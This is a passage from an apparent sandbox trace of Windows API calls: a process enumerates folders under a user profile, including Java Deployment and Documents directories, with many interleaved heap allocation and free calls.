explorer\\domstore\\vgmtoi09\\www.msn[1].xml.npsg")) returned 1 [0246.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.273] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.274] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0246.274] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8888 | out: hHeap=0x620000) returned 1 [0246.274] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0246.274] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ed18 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8ff10 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0246.279] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.279] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.279] PathFindFileNameW (pszPath="") returned="" [0246.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.281] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.281] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.281] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.281] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ed18 [0246.281] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ea20 [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0246.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0246.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0246.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0246.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8ff10 [0246.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0246.282] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.282] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.282] PathFindFileNameW (pszPath="") returned="" [0246.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0246.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.284] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.284] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x3b90810 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bdd0 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c7c8 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c6e0 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c5f8 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bfa0 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c258 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x346dcd0 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x346ddb8 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x346dea0 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x346df88 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x346e070 [0246.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x346e158 [0246.284] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 0 [0246.284] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.285] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8888 [0246.285] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\") returned="D0CsPE54nS\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393e80 [0246.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\") returned="ma0LRjiKCyKK4\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ed18 [0246.285] 